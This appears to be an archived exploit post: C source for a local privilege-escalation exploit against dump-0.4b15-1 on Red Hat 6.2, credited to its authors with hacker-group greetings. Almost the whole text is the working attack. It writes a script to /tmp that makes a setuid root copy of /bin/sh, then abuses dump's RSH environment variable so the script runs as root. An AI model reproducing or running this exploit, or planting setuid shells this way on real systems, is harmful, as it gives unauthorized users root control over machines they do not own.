Dump-0.4b15-1 local root exploit tested on Redhat 6.2.
d31cd93409f644756b8b6acfdfd278b35330784f6a3365bc1c5848ed1558216f
/* dump-0.4b15-1 exploit for linux redhat 6.2
dump executing a user editable enviroment setting that runs a file
without dropping root priviledges, thus making the spawn of a root
shell possible.
bug discovered by: mat <mat@hacksware.com>
exploit code by: The Itch / BsE
P.S.: mind the dumb coding, its my first exploit and im still learning
shouts go out to:
Xistence, C-murdah, dystopia, Pyra, Zer0, Wildcoyote, lucipher, Tozz
Shadowlady, Dilusi0n, Calimonk, s0k, Script0r and the rest of Ph33r the B33r
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define DUMP "/sbin/dump"
#define TMP "/tmp/rsh"
#define ROOTSHELL "/tmp/sush"
// if you changed #define TMP then change the path of the CHATTRIB too
#define CHATTRIB "chmod 755 /tmp/rsh"
// if you changed the path of dump in #define DUMP then change the
// path of #define RUNDUMP too
#define RUNDUMP "/sbin/dump -0 /"
int main()
{
FILE *rshfile;
FILE *dumpfile;
printf("\n* Dump exploit for linux redhat 6.2\n");
printf("* Bug discovered by Mat <mat@hacksware.com>\n");
printf("* Exploit coded by The Itch / BsE\n\n");
dumpfile = fopen(DUMP, "r");
if(!dumpfile)
{
printf("\n%s not found or is not world readable/executable!!\n\n", DUMP);
exit(0);
}
fclose(dumpfile);
rshfile = fopen(TMP, "w");
fprintf(rshfile, "#!/bin/sh\n");
fprintf(rshfile, "cp /bin/sh %s\n", ROOTSHELL);
fprintf(rshfile, "chown root.root %s\n", ROOTSHELL);
fprintf(rshfile, "chmod 4755 %s\n", ROOTSHELL);
fclose(rshfile);
system(CHATTRIB);
printf("Invoking vulnerable program %s\n", DUMP);
printf("Ignore the garbage....\n\n");
putenv("TAPE=garbage:garbage");
setenv("RSH", TMP, 1);
system(RUNDUMP);
printf("\n\nif all went well, a rootshell awaits you in %s\n\n",ROOTSHELL);
return 0;
}
/* Remember, there's no cure for BsE */